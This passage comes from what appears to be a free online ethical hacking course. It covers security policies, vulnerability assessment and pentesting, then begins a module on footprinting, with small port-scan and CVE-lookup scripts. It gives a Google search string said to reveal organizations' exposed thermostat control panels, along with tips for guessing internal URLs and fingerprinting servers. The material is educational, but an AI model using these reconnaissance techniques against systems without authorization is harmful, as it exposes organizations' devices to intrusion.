 To prevent malicious hackers from accessing the organization's information systems.
 To discover vulnerabilities in systems and explore their potential as risks.
 To analyze and strengthen the organization's security posture, including its policies, network protection infrastructure and end-user practices.

Skills of an Ethical Hacker

Ethical hacking is hacking or auditing a company's computer security in a legal way, performed by a pentester to find vulnerabilities in the information technology environment. To perform ethical hacking, the ethical hacker requires the skills of a computer expert. Ethical hackers must also have solid knowledge of computer science, including programming and networking. They must be competent in installing and maintaining the popular operating systems (UNIX, Windows, Linux, Android, iOS, macOS).

Detailed knowledge of the hardware and software provided by popular computer and network
hardware vendors complements this basic knowledge. It is necessary that ethical hackers have an
additional specialization in security. It is an advantage to know how several systems maintain
their security, the management skills corresponding to these systems are necessary for the real
vulnerability tests and to prepare the report once the tests are carried out.

An ethical hacker must have immense patience since the analysis stage consumes more time than
the testing stage. The time frame for an evaluation can vary from a few days to several weeks,
depending on the nature of the task. When an ethical hacker encounters a system they are not familiar with, it is imperative that they take the time to learn everything about the system and try to find its most vulnerable points.

The knowledge an ethical hacker must have or that he should learn can be divided into 2 groups:
technical knowledge and non-technical.

1. Technical knowledge:

 Have a deep knowledge of the main operating environments, such as Windows, Unix,
Linux and MacOS.
 Have a deep knowledge of network concepts, technologies and hardware and related
software
 Should be a computer expert adept in technical domains
 Have knowledge of security areas and related matters
 Have a high technical level to launch sophisticated attacks

2. Non-technical knowledge
This part focuses more on your ethics as a person and your level of commitment to your work in an organization.
 Ability to learn and adapt new technologies quickly
 Strong work ethic, and good problem solving and communication skills
 Committed to the organization's security policies
 Awareness of local laws and standards

Scope and limitations of ethical hacking

 Scope
* Ethical hacking is a crucial component of risk assessment, auditing, anti-fraud efforts, best practices and governance.
* It is used to identify risks, highlight corrective actions, and reduce information and communication technology (ICT) costs by resolving those vulnerabilities.
 Limitations
* Unless a company first knows what it is looking for and why it is hiring an external provider to hack its systems, the exercise is unlikely to yield much.
* Therefore, an ethical hacker can help the organization better understand its security posture, but it is up to the organization to implement the correct safeguards on the network.

Defense in Depth

Multiple defensive countermeasures are taken in depth to protect a company's information assets.
The strategy is based on the military principle that it is harder for an enemy to defeat a complex
and multi-layered defense system than to penetrate a single barrier. If a hacker gains access to a
system, defense in depth minimizes the adverse impact and gives administrators and engineers
time to implement new or updated countermeasures to prevent it from happening again.

Defense in depth is a security strategy in which several layers of protection are placed throughout an information system, helping to prevent direct attacks against the system and its data, because a breach in one layer only leads the attacker to the next layer.

Information Security Controls

Information Assurance
Information Assurance, refers to the guarantee that the integrity, availability, confidentiality
and authenticity of the information systems are in conditions and protected during use,
processing, storage and transmission of information.

Some of the processes that help achieve information assurance include:

1. Develop local policies, processes and guidance
2. Network and user authentication strategy design
3. Identification of problems and resource requirements
4. Create a plan for the identified resource requirements
5. Application of appropriate information assurance controls
6. Performing certification and accreditation
7. Provide information assurance training

Modeling of threats

Threat modeling is a risk assessment approach for analyzing the security of an application by capturing, organizing and analyzing all the information that affects its security.

1. Identify security objectives: helps you determine how much effort to put into the subsequent steps
2. Application overview: identify components, data flows and confidence limits
3. Decompose the application: helps you find more relevant and more detailed threats
4. Identify threats: identify the threats relevant to your control and context scenario using
the information obtained in steps 2 and 3.
5. Identify vulnerabilities: identify weaknesses related to threats found using vulnerability
categories

Enterprise Information Security Architecture (EISA)

EISA is a set of requirements, processes, principles and models that determine the structure and
behavior of the information systems of an organization.

Objectives of EISA:

1. It helps to monitor and detect network behaviors in real time, acting on external and
internal security risks.
2. Help an organization detect and recover from security attacks.
3. Help prioritize the resources of an organization and pay attention to various threats.
4. It helps the organization obtain prospective cost benefits when integrated with security provisions such as incident response, disaster recovery, event correlation, etc.
5. Help analyze the procedure necessary for the IT department to function correctly and
identify the assets.
6. Helps to perform the risk assessment of the IT assets of an organization with the
cooperation of the IT staff.

Network security zoning

The network security zoning mechanism allows an organization to manage a secure network environment by selecting the appropriate security levels for the different zones of its Internet and intranet networks. It helps to effectively monitor and control incoming and outgoing traffic (a small classification sketch follows the list of common zones below).

Common examples of network zones:

 Internet Zone: uncontrolled zone, since it is outside the limits of an organization
 Internet DMZ: controlled zone, as it provides a buffer between internal networks and the Internet
 Production network zone: restricted zone, since it strictly controls direct access from
uncontrolled networks
 Intranet Zone: controlled area without heavy restrictions
 Management network zone: safe area with strict policies
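As a small sketch of how the zone concept above might be applied in code, an address can be mapped to the zone whose network range contains it, defaulting to the uncontrolled Internet zone; the address ranges below are made-up placeholders, not recommendations.

```python
from ipaddress import ip_address, ip_network

# Hypothetical zone layout; replace the ranges with your organization's real addressing plan.
ZONES = {
    "internet_dmz":       ip_network("192.0.2.0/24"),
    "production_network": ip_network("10.10.0.0/16"),
    "intranet":           ip_network("10.20.0.0/16"),
    "management_network": ip_network("10.99.0.0/24"),
}

def zone_of(address: str) -> str:
    """Return the name of the zone containing the address, or 'internet' if none matches."""
    addr = ip_address(address)
    for name, network in ZONES.items():
        if addr in network:
            return name
    return "internet"

if __name__ == "__main__":
    print(zone_of("10.99.0.15"))    # management_network
    print(zone_of("203.0.113.7"))   # internet (uncontrolled zone)
```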

Information Security Policies

A security policy is a document or set of documents that describes the security controls that must
be implemented in the company at a high level that safeguards the organization's network from
internal and external attacks. This document defines the complete security architecture of an
organization and the document includes clear objectives, goals, rules and regulations, formal
procedures, etc. It clearly mentions the assets that must be protected and the person who can log
in and access the sites, who can see the selected data, as well as the people who can change the
data, etc. Without these policies, it is impossible to protect the company from possible lawsuits,
loss of income, etc.

Security policies are the basis of the security infrastructure. These policies protect an organization's information resources and provide legal protection to the organization. They are beneficial because they raise awareness among the organization's staff, getting them to work together to secure its communications, and they minimize the risk of security weaknesses caused by "human factor" errors such as disclosing sensitive information to unauthorized or unknown parties, improper use of the Internet, etc. In addition, these policies provide protection against cyber attacks, malicious threats, foreign intelligence agencies, etc. They mainly cover physical security, network security, access authorization, virus protection and disaster recovery.
The objectives of the security policies include:

 Maintain a scheme for the administration of network security
 Protection of the organization's computing resources
 Elimination of legal liability arising from employees or third parties
 Guarantee the integrity of the client and avoid the waste of computer resources of the
company
 Avoid unauthorized data modifications
 Reduce the risks caused by the illegal use of system resources and the loss of sensitive
and confidential data
 Differentiate a user's access rights
 Protect confidential and proprietary information from theft, misuse or unauthorized
disclosure.

Classification of Information Security Policies

Security policies are sets of rules developed to protect or safeguard information assets, networks, etc., of any type of infrastructure. These policies apply to users, IT departments, the organization as a whole, etc. For effective security management, security policies are classified into five different areas:

 User Policy: defines what type of user is using the network, defines the limitations that
apply to users to protect the network, for example: password management policy.
 IT Policy: designed for an IT department to keep the network secure and stable, for
example, backup policies, server configuration, patch updates, modification policies,
firewall policies.
 General policies: define responsibility for generic commercial purposes, for example:
high-level program policy, business continuity plans, crisis management, disaster
recovery.
 Partner policy: policy that is defined between a group of partners
 Problem specific policies: recognize specific areas of concern and describe the state of
the organization for high level management. Eg: physical security policy, personnel
security policy, communications security.

Structure and internal content of an Information Security Policy

A security policy is the document that defines how to protect the company's personnel, physical assets and data against security threats or breaches. Security policies should be structured with great care and properly reviewed to ensure there is no wording that someone can take advantage of. The basic structure of a security policy should include the following:

 Detailed description of policy issues
 Description of the state of the policy
 Applicability of the policy to the environment
 Functionalities of those affected by the policy
 Specific consequences that will apply if the policy is not complied with, in accordance with the organization's standards.

Content of Security Policies

Security policies generally contain the following elements:

 High level security requirements: explains the requirements a system must meet to implement security policies. The four different types of requirements are discipline, safeguarding, procedural and assurance requirements.
* Security requirements of the discipline: this requirement includes various security
policies, such as security of communications, computer security, security of operations,
security of emanations, network security, security of personnel, security of the
information and physical security.
* Safeguarding security requirements: this requirement mainly contains access
control, file, audit, authenticity, availability, confidentiality, cryptography, identification
and authentication, integrity, interfaces, marking, non-repudiation, reuse of objects,
recovery and protection against viruses.
* Procedural security requirements: this requirement mainly contains access
policies, liability rules, plans and documentation of continuity of operations.
* Assurance security requirements: these include certification and accreditation reviews and maintenance planning documents used in the assurance process.
 Description of policy: focuses on security disciplines, safeguards, procedures, continuity
of operations and documentation. Each subset of this part of the policy describes how the
system architecture will apply security.
 Security concept: mainly defines the roles, responsibilities and functions of a security policy. It focuses on the mission, communications, encryption, user and maintenance rules, downtime management, use of proprietary versus public-domain software, shareware rules and a virus protection policy.
 Assignment of security application to architecture elements: provides an architecture
assignment of the computer system to each system of the program.

Types of Security Policies

We know that policies help maintain the confidentiality, availability and integrity of information,
now we will look at the four main types of security policies:

1. Promiscuous policy: there are no restrictions on Internet access. A user can access
any site, download any application and access a computer or network from a remote
location. While this can be useful in corporate companies where people who travel or
work from branches need access to the organizational networks, many malicious programs,
viruses and Trojan threats are present on the Internet, and because of unrestricted Internet
access this malware can arrive as attachments without the user's knowledge. Network
administrators must be extremely alert if this type of policy is chosen.
2. Permissive policy: most Internet traffic is accepted, but several known dangerous
services and attacks are blocked. Because only known attacks and exploits are blocked, it
is impossible for administrators to keep up with current exploits; administrators are always
playing catch-up with new attacks and exploits.
3. Prudent policy: starts with all services blocked; the administrator enables safe and
necessary services individually. This provides maximum security. Everything, such as
system and network activity, is logged.
4. Paranoid policy: everything is forbidden; there is a strict restriction on the use of
the company's computers, whether it is use of the system or use of the network.
There is either no Internet connection or severely limited Internet use. Because of these
overly strict restrictions, users often try to find ways around them, for example by using a VPN.

Examples of everyday Security Policies

 Access control policy: defines the resources that are protected and the rules that control
access to them
 Remote Access Policy: defines who can have remote access and defines the means of
access and remote access security controls
 Firewall management policy: defines the access, management and control of firewalls
in the organization.
 Network connection policy: defines who can install new resources in the network,
approve the installation of new devices, document changes in the network, etc.
 Password Policy: provides guidelines for secure password protection of the
organization's resources (a minimal enforcement sketch follows this list)
 User account policy: defines the process of creating the account, and the authority, rights
and responsibilities of user accounts
 Information protection policy: defines the sensitivity levels of information, who can
access it, how it is stored and transmitted, and how it should be removed from storage
media
 Special Access Policy: this policy defines the terms and conditions for granting special
access to system resources
 Email security policy: was created to control the correct use of corporate email
 Acceptable Use Policy: defines the acceptable use of system resources
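
To make the password policy above concrete, here is a minimal sketch in Python of how such a
policy could be enforced technically. The specific rules (minimum length, required character
classes) are hypothetical values chosen for the example; a real organization would take them
from its own written policy document.

import re

# Hypothetical policy parameters: take the real values from your policy document
MIN_LENGTH = 12
REQUIRED_CLASSES = {
    "lowercase": r"[a-z]",
    "uppercase": r"[A-Z]",
    "digit": r"[0-9]",
    "symbol": r"[^A-Za-z0-9]",
}

def check_password(password):
    """Return a list of policy violations; an empty list means the password complies."""
    violations = []
    if len(password) < MIN_LENGTH:
        violations.append("shorter than %d characters" % MIN_LENGTH)
    for name, pattern in REQUIRED_CLASSES.items():
        if not re.search(pattern, password):
            violations.append("missing at least one %s character" % name)
    return violations

print(check_password("Sup3r-Secret-Passw0rd"))  # [] -> compliant
print(check_password("password"))               # several violations

In practice this kind of check would be wired into the account creation and password change
procedures as part of enforcing the policy with tools.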

Steps to create and implement a Security Policy

The implementation of security policies reduces the risk of being attacked. Therefore, each
company must have its own security policies based on its business. The following are the steps
that each organization must follow to create and implement security policies

1. Carry out a risk assessment to identify the risks of the assets of the organization
2. Learn from the standard guidelines of other organizations
3. Include senior management and all other staff in the development of policies
4. Establish clear sanctions and enforce them, and also review and update the security
policy
5. Make the final version available to all staff in the organization
6. Make sure that each member of your staff reads, signs and understands the policy
7. Install the tools you need to enforce the policy
8. Train your employees and educate them about the policy

Privacy policies in the workplace

Employers will have access to personal information of employees that may be confidential and
that they wish to keep private, that is why privacy policies were created to protect the private
information of each employee that is part of a company.

Basic rules for privacy policies in the workplace:

 Be careful with the private information you collect and store about your employees: why do
you collect it, and what will you do with it?
 Limit the collection of information and obtain it by fair and legal means
 Inform employees about the possible collection, use and disclosure of personal
information
 Keep personal information of employees accurate, complete and with updated data
 Provide employees with access to their personal information
 Keep employees' personal information secure, not letting any employee see private
information about another employee.

Involvement of the Human Resources and Legal departments in the application of information
security policies

The Human Resources department and its involvement:

 Is responsible for informing employees about security policies and training them on the
best practices defined in the policy.
 Works with management to monitor the implementation of policies and to address any
policy violation issues

The Legal department and its involvement:

 Business information policies must be developed in consultation with legal experts and
must comply with relevant local laws.
 The application of a security policy that may violate the rights of users and employees of
the company in contravention of local laws may lead to lawsuits against the organization

Physical security
Physical security is the first layer of protection in any organization.
It involves protecting the organization's assets against environmental and man-made
threats.

Why physical security?


To avoid any unauthorized access to system resources, to avoid manipulation or theft of data from
computer systems, to protect against espionage, sabotage, damage or theft, to protect personnel
and to prevent social engineering attacks.

Threats to Physical Security

Environmental threats:

 Floods
 Fires
 Tremors
 Dust

Threats produced by humans:

 Terrorism
 Wars
 Explosion
 Dumpster diving and theft
 Vandalism

Physical Security Controls

 Locations and environment of the company: fences, doors, walls, protections, alarms,
CCTV cameras, intrusion systems, panic buttons, burglar alarms, windows and door bars,
interlocks, etc.
 Reception area: lock away important files and lock the computer when it is not in use
 Server and workstation areas: lock systems when they are not in use, disable or remove
removable media and DVD-ROM drives, install CCTV cameras, design workstations appropriately
 Other equipment such as fax machines, modems and removable media: lock fax machines
when they are not in use, file received faxes properly, disable the auto-answer
mode of modems, do not leave removable media in public places and physically
destroy damaged media before disposal
 Access control: separate work areas, implement biometric access controls (fingerprint,
retinal, iris, vein-structure, face and voice recognition), entry cards, mantraps,
sign-in procedures, identification badges, etc.
 Maintenance of computer equipment: designate a person to be in charge of the
maintenance of the computer equipment
 Cabling: inspect all cables that routinely transport data, protect cables with shielded
cables, never leave any cables exposed
 Environmental control: humidity and air conditioning, HVAC, fire suppression, EMI
shielding and cold and hot aisles.

Incident Management Response

Incident management is the process of recording and resolving incidents that take place in the
organization. The incident may occur due to a failure, service degradation, error, etc. The
incidents are reported by users, technical staff, or are sometimes detected automatically by the
event monitoring tools. The main objective of the incident management process is to restore
normal service to customers as soon as possible, while maintaining the availability
and quality of the service. Every incident that occurs in the organization must be handled and
resolved.

Incident Management Process:

1. Preparing for incident management and response


2. Detection and analysis
3. Classification and prioritization
4. Notification
5. Containment
6. Forensic investigation
7. Eradication and recovery
8. Post-incident activities

Responsibilities of an Incident Management Team

1. Manage security issues by adopting a proactive approach to client security vulnerabilities
and responding effectively to possible information security incidents
2. Develop or review the processes and procedures that must be followed in response to an
incident
3. Manage the response to an incident and ensure that all procedures are followed correctly
to minimize and control the damage
4. Identify and analyze what happened during an incident, including the impact and threat
5. Provide a single point of contact to report incidents and security problems
6. Review changes in legal and regulatory requirements to ensure that all processes and
procedures are valid
7. Review existing controls and recommend steps and technologies to prevent future
security incidents
8. Establish a relationship with the local law enforcement agency, government agencies, key
partners and suppliers.
Vulnerability Assessment

Vulnerability assessment is a test of the ability of a system or application, including its current
procedures and controls, to withstand a computer attack. It recognizes, measures and classifies
security vulnerabilities in a computer system, network and communication channels.

A vulnerability assessment can be used for:

 Identify weaknesses that could be exploited


 Predict the effectiveness of additional security measures to protect information resources
from attack

Types of Vulnerability Assessments

 Active evaluation: uses a network scanner to find hosts, services and vulnerabilities (a minimal sketch follows this list).
 Passive evaluation: technique used to sniff network traffic to discover active systems,
network services, applications and vulnerabilities present.
 Host-based evaluation: determines vulnerabilities in a specific workstation or server.
 Internal evaluation: a technique to scan the internal infrastructure to discover exploits
and vulnerabilities.
 External evaluation: evaluates the network from a hacker's point of view to discover
which vulnerabilities are accessible to the outside world.
 Application Evaluations: Test the web infrastructure to detect any erroneous
configuration and known vulnerabilities.
 Network evaluation: determines the possible network security attacks that may occur in
the organization's system.
 Wireless network assessments: determines the vulnerabilities in the wireless networks
of the organization.
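
As a very small illustration of an active evaluation, the sketch below probes a handful of TCP
ports on a host you are authorized to test. It only checks whether a port accepts a connection;
a real scanner such as Nmap does far more (service and version detection, scripted vulnerability
checks). The target name and port list are placeholders.

import socket

TARGET = "scanme.example.com"   # placeholder: use only hosts you have permission to scan
PORTS = [21, 22, 25, 80, 110, 143, 443, 3306, 3389]

def is_open(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

for port in PORTS:
    state = "open" if is_open(TARGET, port) else "closed/filtered"
    print("%s:%d -> %s" % (TARGET, port, state))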

Vulnerability assessment methodology

Phase 1 - Acquisition

 Review laws and procedures related to vulnerability assessment of the network


 Identify and review documents related to network security
 Review the list of vulnerabilities previously discovered

Phase 2 - Identification

 Conduct interviews with clients and employees involved in the design and administration
of the system architecture
 Collect technical information about all network components
 Identify the different industry standards that the network security system meets

Phase 3 - Analyzing

 Review interviews
 Analyze the results of previous vulnerability assessments
 Analyze security vulnerabilities and identify risks
 Perform threat and risk analysis
 Analyze the effectiveness of existing security controls
 Analyze the effectiveness of existing security policies

Phase 4 - Evaluation

 Determine the probability of exploitation of the identified vulnerabilities


 Identify the gaps between existing security measures and those required
 Determine the controls needed to mitigate the identified vulnerabilities
 Identify the required updates for the vulnerability assessment process of the network

Phase 5 - Generation of reports

 The result of the analysis must be presented in a draft report to be evaluated for further
revisions
 The report must contain:
* Task performed by each team member
* Methods used and findings
* General and specific recommendations
* Terms used and their definitions
* Information collected from all phases
 All documents must be stored in a central database to generate the final report

Vulnerability Research

Vulnerability research means discovering flaws and weaknesses in system design that could help
attackers compromise the system. Once an attacker discovers a vulnerability in a product or
application, he or she tries to exploit it.

The search for vulnerabilities helps both security administrators and attackers:

 Discover flaws and weaknesses in system design that could help attackers compromise
the system
 Keep up to date with the latest vendor products and other technologies, and find news
related to current exploits
 Check recently released alerts about relevant innovations and product improvements
for security systems
 Vulnerability research is classified based on:
* Severity level (low, medium or high)
* Exploit range (local or remote)

An ethical hacker needs to conduct vulnerability research:

 To collect information about security trends, threats and attacks


 To find weak points and alert the network administrator before a network attack
 To obtain information that helps prevent security problems
 To know how to recover from a network attack

Websites of interest:

 https://www.exploit-db.com/
 https://www.securityfocus.com/
 https://www.cvedetails.com/
 https://www.infosecurity-magazine.com/
 https://www.google.com/
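
Part of vulnerability research can be automated against public databases. As one possible
illustration, the sketch below queries the public NVD REST API (version 2) for CVE entries
matching a keyword. The endpoint and parameter names reflect my understanding of the current
public API, so check the NVD documentation before relying on them; it also assumes the
third-party requests package is installed.

import requests

NVD_API = "https://services.nvd.nist.gov/rest/json/cves/2.0"  # assumed NVD v2 endpoint

def search_cves(keyword, limit=5):
    """Return up to `limit` (CVE id, short description) pairs matching a keyword."""
    resp = requests.get(NVD_API,
                        params={"keywordSearch": keyword, "resultsPerPage": limit},
                        timeout=30)
    resp.raise_for_status()
    results = []
    for item in resp.json().get("vulnerabilities", []):
        cve = item.get("cve", {})
        descriptions = cve.get("descriptions", [])
        summary = descriptions[0]["value"] if descriptions else ""
        results.append((cve.get("id"), summary[:120]))
    return results

for cve_id, summary in search_cves("nginx 1.4.1"):
    print(cve_id, "-", summary)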

Pentesting

Penetration testing is a method of evaluating the security level of a particular system or network;
it helps you determine flaws related to hardware and software. Early identification helps
protect the network: if vulnerabilities are not identified early, they become an easy avenue
of attack for an intruder.

During the penetration tests, a pentester analyzes all the security measures used by the
organization to detect weaknesses in the design, technical failures and vulnerabilities.

Types of Pentesting

There are 3 types of tests:

1. Black box tests: simulate an attack by someone who is not familiar with the system.
2. White box tests: simulate an attacker who has extensive knowledge of the system.
3. Gray box tests: simulate an attack with limited access to the target system.
Once the tests are done, the pentester documents the successful attacks and the respective
countermeasures that can be applied to prevent a malicious hacker from reproducing the same
attacks. Finally, the pentester delivers the report to executive, managerial and technical audiences.

Important points of why Pentesting is necessary:

 Identify the threats that an organization's information assets face


 Reduce an organization's IT security costs and improve return on security investment
(ROSI) by identifying and correcting vulnerabilities or weaknesses.
 Provide a comprehensive assessment of the organization's security, covering policy,
procedure, design and implementation.
 Obtain a certification to maintain an industry regulation
 Adopt best practices in accordance with legal and industry regulations
 To test and validate the effectiveness of security protections and controls
 To change or update the existing infrastructure of software, hardware or network design
 Focus on high-severity vulnerabilities and emphasize application-level security issues for
development teams and management
 Provide a comprehensive approach to the preparation steps that can be taken to prevent
the next exploitation
 Evaluate the effectiveness of network security devices such as firewalls, routers and web
servers.

Methodologies to perform a good Pentesting

As a pentester, you should never overlook any information resource. All possible sources of
information should be tested for vulnerabilities, and not only information sources: every
mechanism and piece of software involved in the business should be tested as well, because even
if an attacker cannot compromise the information system directly, he or she can try to gain access
through another system and then reach the confidential information. Some attacks, such as
denial-of-service attacks, do not even need access to the system. Therefore, to be sure you verify
all possible ways of compromising a system or network, you must follow a penetration testing
methodology. This ensures the full scope of the test.

Examples of some methodologies for Pentesting:

1. OWASP: the Open Web Application Security Project is an open source application security
project that helps organizations purchase, develop and maintain software tools, software
applications and knowledge-based documentation for web and mobile application
security.
2. OSSTMM: the Open Source Security Testing Methodology Manual is a peer-reviewed
methodology for performing high-quality security tests, covering: data controls, fraud and
social engineering control levels, computer networks, wireless devices, mobile devices,
physical security access controls and various security processes.
3. ISSAF: the Information Systems Security Assessment Framework is an open source
project aimed at providing security assistance to professionals. The mission of ISSAF is
"to research, develop, publish and promote a complete, practical and generally accepted
information systems security assessment framework".

Comparison between Security Audit, Vulnerability Assessment and Pentesting: what
differences are there between them?

Security audit: a security audit only verifies if the organization follows a set of security policies
and procedures based on an industry security standard.

Vulnerability assessment: a vulnerability assessment focuses on discovering vulnerabilities in
the information system, but does not provide any indication of whether the vulnerabilities can be
exploited or of the amount of harm that could result from their successful exploitation.

Pentesting: a methodological approach to security assessment that covers the security audit
and the vulnerability assessment, and demonstrates whether the vulnerabilities in a system can be
exploited successfully by attackers; in other words, it does everything a hacker would do,
demonstrating how security can be breached and the system entered, but legally and for security
purposes.

Phases of penetration tests

Phase prior to attack:

 Planning and preparation


 Methodology design
 Gathering network information

Attack phase:

 Penetrating the perimeter
 Acquiring the target
 Escalating privileges
 Execution, implantation, retracting

Post-attack phase:

 Reports
 Clean
 Destruction of artifacts
Blue team vs Red team

Blue Team:

 An approach in which a team of security responders performs an analysis of an information
system to evaluate the adequacy and efficiency of its security controls.
 The blue team has access to all resources and information of the organization
 The main function is to detect and mitigate the activities of the red team (attackers) and
anticipate how surprise attacks could occur.

Red Team:

 An approach in which a team of ethical hackers performs a penetration test on an
information system without access, or with very limited access, to the internal resources
of the organization.
 Can be done with or without warning
 Its purpose is to detect vulnerabilities in networks and systems, and to verify security from
the perspective of an attacker against the network, the system or access to information.

This module ends here; I hope you have been able to meet the objectives of this module. This
course takes effort and it is free, so I would appreciate it if you shared it on your social networks
or in hacking forums so that more people see it. The course will grow to at least 20 modules and
will become more advanced; you can subscribe if you want to follow the progress of the course,
and every 7 days an email is sent summarizing everything that happens on the blog.

27 January 2018
Ethical Hacking Course - Module 2 -
Objective recognition
Ethical Hacking Course, Computer Security

Surely you have already finished module 1 - introduction to ethical hacking. In module 2 -
objective recognition - of this computer security course, we will see everything about the
reconnaissance of potential targets.

Full course: en.gburu.net/hack, here you will find all the topics of this free ethical hacking
course, in one place.

Responsibility:
This ethical hacking course is aimed at educational purposes, to improve your computer security
skills so you can plan and design safer networks. It does not encourage illegal activities in systems
or networks of third parties; if you commit an illicit activity in a system or network, you will do
so at your own risk. If you want to practice and improve your ethical hacking skills, do it on
systems that are yours or where you have legal permission; I recommend using operating system
images installed in virtual machines in a controlled environment.

Agenda: Module 2 - Objective Recognition

 Objectives of module 2
 What is Footprinting?
 Why is Footprinting necessary?
 Footprinting Objectives
 Footprinting Methodology
 Footprinting with search engines
o Find thermostat control panels with Google
 Find the external and internal URLs of the organization
 Determine the Target Operating System
 Target location
 Search for people: social networking sites / people search services
 Target finance information
 Recognition with a website
o Interesting tools
o Browse HTML source code and Cookies
o Web spiders
o Duplication of a website
o E-Mail Recognition
o Tracking of email communications
 Collect information through Competitive Intelligence
o Competitive intelligence: when did this company start? How did it develop?
o Traffic monitoring of target company website
o Tracking target's online reputation
 Recognition: Advanced Google Hacking Techniques
o What can a hacker do with Google?
 Recognition: WHOIS Databases
 Recognition: Collect DNS information
 Recognition: Locate range of the Network
o Map Network route
 Recognition: Get information through Social Engineering
o Common Social Engineering Techniques
 Important tools for target recognition
 Countermeasures to Recognition

Objectives module 2
It is expected that by completing this module 2 of the computer security course, you can learn in
depth the following:

 Understand the concepts of Recognition


 Recognition through the search engines
 Recognition using advanced google hacking techniques
 Recognition through social networking sites
 Understand the different techniques for Recognition of a website
 Understand the different competitive intelligence techniques
 Understand the different techniques for WHOIS Recognition
 Understand the different techniques for DNS Recognition
 Understand the different techniques for Recognition in a network
 Understand the different techniques of Recognition through social engineering
 Countermeasures for the Recognition

Ethical hacking is a process in which a person, with the legal permission of the organization,
analyzes and attacks a computer network as a malicious hacker would; these people are
called "pentesters". Ethical hacking has several phases; the first one is called
"footprinting", which is about performing a general reconnaissance of the potential target to be audited.
The more valuable information the pentester collects, the more likely it is that the attack will be
carried out successfully. That is why it is a very important phase prior to the attack, and in this
module of the computer security course we will see this hacking phase in more detail.

What is Footprinting?
Footprinting, the first step of ethical hacking, refers to the process of gathering information
about a target network and its environment. Using footprinting, you can find several ways to
get into the network of the target organization. It is considered "methodological"
because it seeks critical information based on previous discoveries.

Once you start the process of footprinting methodologically, you will get the plan of the security
profile of the target organization. Here the term "blueprint" is used because the result obtained at
the end of footprinting refers to the unique system profile of the target organization.

There is no single methodology for footprinting, as it can track information on several routes.
However, this activity is important since all the crucial information must be gathered before
starting to hack. Therefore, you must perform the footprinting in a precise and organized manner.

Why is recognition necessary?

In order for attackers or pentesters to create an attack strategy, they need to gather information
about the network of the target organization, so that they can find the easiest way to enter the
security perimeter of the organization. As mentioned above, footprinting is the easiest way to gather
information about the target organization, and it plays a vital role in the hacking process.

The recognition of the target network, can offer us different amounts of information related to
our objective, among them there are 4 important:

1. Know the security posture: the recognition allows the attackers to know the external
security posture of the target organization.
2. Reduces the focus area: reduces the focus area of the attacker to a specific range of IP
addresses, networks, domain names, remote access, etc.
3. Identify vulnerabilities: allows the attacker to identify vulnerabilities in the target
systems to select appropriate exploits.
4. Draw the network map: allows attackers to draw a map or sketch of the network infrastructure
of the target organization, to learn the real environment they are going to hack.

Objectives of the Recognition

The main objectives of the recognition include gathering the network information of the
objective, the information of the system and the information of the organization. When you
perform footprinting at various network levels, you can obtain information such as: network
blocks, network services and applications, system architecture, intrusion detection systems,
specific IP addresses and access control mechanisms. With the fingerprint, information is also
obtained from potential employees.

1. Collect information from the target network:


o Domain names
o Name of internal domains of the organization
o Network blocks
o IP addresses of all systems that can be reached
o Restricted or private websites, intranets.
o Services running over TCP or UDP
o Controls of access mechanisms, or ACLs
o Network protocols
o VPN points
o Possible IDS monitoring the network
o Digital and analog phone numbers
o Authentication mechanisms
o Enumeration of systems
2. Collect system information:
o Names of user groups
o System Banners (Banner Grabbing)
o Routing tables
o Information about SNMP
o Operating system architecture
o Remote system type
o Names of systems
o Poorly protected passwords
3. Collect information about the organization:
o Information about employees
o Website of the Organization
o Directory of the organization
o Information about your location
o Phone numbers
o Comments in the HTML code
o Security policies implemented
o News about the organization
o Relevant links on the website

Footprinting Methodology

The footprinting methodology is a procedural way of gathering information about a target
organization from all available sources. It involves collecting information about the target
organization: determining the URL, the location, establishment details, the number of
employees, the specific domain names and contact information. This information can
be collected from various sources, such as search engines, WHOIS databases, etc.

Search engines are the main sources of public information where you can find valuable
information about your target organization. Therefore, we will first discuss the footprint through
the search engines. Here we will discuss how and what information we can collect through the
search engines (Google, Yahoo!, Bing, etc.).

Footprinting: search engines


A web search engine is designed to search for information on the WWW. Search results are
usually presented in a list of results, often referred to as search engine results pages (SERPs).
Nowadays, many search engines allow you to extract information about a target organization,
such as technology platforms, employee details, login pages, intranet portals, and so on. With
this information, an attacker can build an attack strategy to enter the network of the target
organization and carry out other types of advanced system attacks. A search on Google could
reveal postings to forums by security personnel that reveal brands of firewalls or antivirus
software in use on the target. Sometimes, there are even network diagrams that can guide an
attack.

As an ethical hacker, if you find confidential information about your company on the search
engine results pages, you should delete that information. Even if you delete confidential
information, it may still be available in a search engine cache. Therefore, you should also check
the search engine cache to make sure that confidential data is permanently deleted.

Find thermostat control panels with Google

If you do not believe the potential for damage that search engines can generate for an
organization, look at this search parameter for Google:
intitle:"Status & Control" + "Thermostat Status" +"HVAC Settings" +"Zone
Temperature"

Just copy and paste it into Google and you will get access to thermostat control panels, most
likely belonging to organizations, and very likely suffering from misconfiguration vulnerabilities:
devices taken out of the box and connected to the nearest router with everything left at defaults,
used without paying attention to their configuration, much less applying a little security. In the
practice session of this module we will see more of these attacks.

This search parameter was written by: Ankit Anubhav NewSky Security. (Know more).

Find the external and internal URLs of the organization

The external and internal URLs of a company provide a lot of useful information to the attacker.
These URLs describe the company and provide details such as the mission and vision of the
company, the products or services offered, etc. The URL that is used outside the corporate
network to access the company's server through a firewall is called the external URL. It is
linked directly to the external website of the company. The external URL of the target company
can be determined with the help of search engines such as Google or Bing.

If you want to find the external URL of an organization, follow these steps:
1. Open any of the search engines, such as Google or Bing.
2. Enter the name of the target company in the search box and press Enter.

The internal URL is used to access the company's server directly from within the corporate
network. The internal URL helps to access the internal functions of a company. Most companies
use common formats for internal URLs. Therefore, if you know the external URL of a company,
you can predict an internal URL by trial and error. These internal URLs provide information
about different departments and business units in an organization. You can also find the internal
URL of an organization using tools such as netcraft.

Tool to search internal URLs:

1. Netcraft: the most popular; it provides web server and web hosting market-share analysis
and operating system detection. It offers a free anti-phishing toolbar and reports the risk
rating and the location of the server where the websites we visit are hosted.

Determine the Target Operating System

There are many ways to determine an operating system that in practice we will see, but if you
want to do it quickly and online you can try Netcraft or Shodan.

Netcraft can be used to determine the operating system of the server that answered us; for
example, querying vulnweb.com shows that it is running on Linux with Nginx 1.4.1.

Shodan (https://www.shodan.io/host/176.28.50.165) fulfills a similar function, but adds more
detail, such as all the open ports and services used by the target.
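
Another quick, low-effort check is to look at the HTTP response headers yourself: many servers
announce their software (and sometimes hint at the operating system) in the Server header. A
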